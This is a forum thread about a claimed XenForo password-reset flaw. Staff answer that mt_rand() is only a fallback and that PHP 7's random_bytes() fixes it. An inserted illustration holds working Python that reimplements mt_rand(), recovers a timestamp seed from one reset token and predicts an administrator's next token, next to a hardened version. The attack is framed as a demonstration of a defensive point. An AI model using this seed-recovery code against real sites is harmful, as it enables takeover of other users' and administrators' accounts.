current 0day exploit for xenforo?

Brandon Sheley

Well-known member
I ran across this post on Twitter and asked for more info. I tagged @Kier and @Mike on Twitter.


He said he contacted you guys already about it as well.

Feel free to move this thread if this isn't the right place for it.



The PRNG for their password reset mechanism takes values from mt_rand() and is susceptible to seed recovery attacks.

Simply a case of figuring out how the seed is generated; from there you can reset other users' passwords (including admins, of course).

Writeups on issues w/ PRNG lacking sufficient seeding + another vuln that I'm not gonna describe (but leads to RCE) coming soon :)

I'm in contact w/ someone @ xenforo already, btw. Gave them info on the PRNG issue a while back. Just need to do the writeups.
 
This isn't something we have been contacted about, though we have seen similar comments before about similar claims which are not legitimate. We are just checking to make sure.

The only thing that sprang to mind was that we were contacted about a year ago by @rugk and in response to that we made some changes in XF 1.5.11:
Today, we are pleased to release XenForo 1.5.11. This release fixes a number of bugs and issues that were found since the release of 1.5.10. As this is a maintenance release, the vast majority of the focus was an increase in stability.

Notably, we have adjusted the exact procedure used for generating secure random data to adhere to current best practices. If your system does not have access to a modern and fully secure approach to generating random data, we will now warn you during installation/upgrades and display a message indicating this in the control panel. If possible, we recommend using PHP 7 to take advantage of the new features for generating random numbers. Thanks to @rugk for bringing this to our attention.
Even so, the claim that we use mt_rand() within our random string generator is not exactly accurate for the common case. This only happens as an absolute fallback if a number of other methods do not work. If that method is used, then we (since 1.5.11 noted above) will notify you. Generally, if this concerns you, then the recommendation is to upgrade to PHP 7.0 (or preferably 7.1) as the method used in that case is the native random_bytes() function.
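Added example to make the two claims above concrete (the tweet's "seed recovery against mt_rand()" and Chris's point that random_bytes() is the fix). This is not XenForo's code and not the researcher's writeup: it models standard MT19937 as PHP 7.1+ mt_rand() uses it (mt_rand() with no arguments returns the top 31 bits of each output), and assumes a hypothetical weak token generator that concatenates four mt_rand() values and a process seeded from the request timestamp. The seed value, the token format and the 10-minute search window are constructed for the demo.

```python
"""Seed recovery against a reset token built from PHP-style mt_rand().

Added illustration (not XenForo's code). Models standard MT19937 as used by
PHP 7.1+ mt_rand() and a HYPOTHETICAL token generator seeded from the request
time, then recovers the seed from one observed token and predicts the next.
"""
import secrets
from typing import Iterable, List, Optional


class MT19937:
    """Standard MT19937: init_genrand(seed) + genrand_int32(), as in PHP 7.1+."""
    N, M = 624, 397

    def __init__(self, seed: int):
        self.mt = [0] * self.N
        self.mt[0] = seed & 0xFFFFFFFF
        for i in range(1, self.N):
            prev = self.mt[i - 1]
            self.mt[i] = (1812433253 * (prev ^ (prev >> 30)) + i) & 0xFFFFFFFF
        self.index = self.N  # force a twist on first use

    def _twist(self) -> None:
        mt, N, M = self.mt, self.N, self.M
        for i in range(N):
            y = (mt[i] & 0x80000000) | (mt[(i + 1) % N] & 0x7FFFFFFF)
            mt[i] = mt[(i + M) % N] ^ (y >> 1) ^ (0x9908B0DF if y & 1 else 0)
        self.index = 0

    def next_u32(self) -> int:
        if self.index >= self.N:
            self._twist()
        y = self.mt[self.index]
        self.index += 1
        y ^= y >> 11
        y ^= (y << 7) & 0x9D2C5680
        y ^= (y << 15) & 0xEFC60000
        y ^= y >> 18
        return y & 0xFFFFFFFF

    def php_mt_rand(self) -> int:
        """PHP 7.1+ mt_rand() with no arguments: the output shifted right by one (31 bits)."""
        return self.next_u32() >> 1


def weak_reset_token(rng: MT19937, words: int = 4) -> str:
    """HYPOTHETICAL weak generator: four 31-bit mt_rand() values rendered as hex."""
    return "".join(f"{rng.php_mt_rand():08x}" for _ in range(words))


def issue_tokens_like_server(seed: int, count: int) -> List[str]:
    """A server process seeded once (here from a timestamp) handing out tokens in order."""
    rng = MT19937(seed)
    return [weak_reset_token(rng) for _ in range(count)]


def recover_seed(observed_token: str, candidates: Iterable[int]) -> Optional[int]:
    """Brute-force the seed: regenerate the first token for each candidate seed and
    compare it with the token the attacker legitimately received for their own account."""
    for seed in candidates:
        if weak_reset_token(MT19937(seed)) == observed_token:
            return seed
    return None


def predict_next_tokens(seed: int, already_issued: int, count: int) -> List[str]:
    """Replay the recovered stream past the tokens already handed out."""
    rng = MT19937(seed)
    for _ in range(already_issued):
        weak_reset_token(rng)
    return [weak_reset_token(rng) for _ in range(count)]


def strong_reset_token() -> str:
    """Hardened form: the OS CSPRNG, the analogue of PHP's random_bytes()."""
    return secrets.token_hex(16)


def demo() -> dict:
    """Attacker requests a reset for themselves, then for the admin, and predicts the admin's token."""
    request_time = 1_500_000_000  # constructed seed: a plausible epoch timestamp
    attacker_token, admin_token = issue_tokens_like_server(request_time, 2)
    window = range(request_time - 300, request_time + 301)  # +/- 5 minutes around the request
    seed = recover_seed(attacker_token, window)
    predicted = predict_next_tokens(seed, already_issued=1, count=1)[0]
    return {"seed": seed, "admin_token": admin_token, "predicted": predicted}


if __name__ == "__main__":
    print(demo())
    print("strong token:", strong_reset_token())
```

The search window is small only to keep the demo instant; the full 32-bit seed space is a modest offline job in C (php_mt_seed does exactly that), so a seed that is not itself drawn from a CSPRNG buys nothing. Two caveats: PHP before 7.1 used a slightly non-standard twist, so the constants above match 7.1+ output, and the attack needs the attacker to see at least one token from the same process, which a self-service reset gives them for free. Both problems disappear when tokens come from random_bytes(), which is what the 1.5.11 change and the PHP 7 recommendation above are about.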
 
Thanks Chris, it's 80% Greek to me, but if it was a real issue I wanted to pass it on to you guys. :)
Also, Mike replied on Twitter; maybe the bug guy will contact you guys again.
 
Thanks. Obviously for future reference if you have information that may be related to a security issue then it would be better to contact us privately. If it were a genuine exploit then we'd prefer to only disclose it once we've prepared and released a fix for it.
 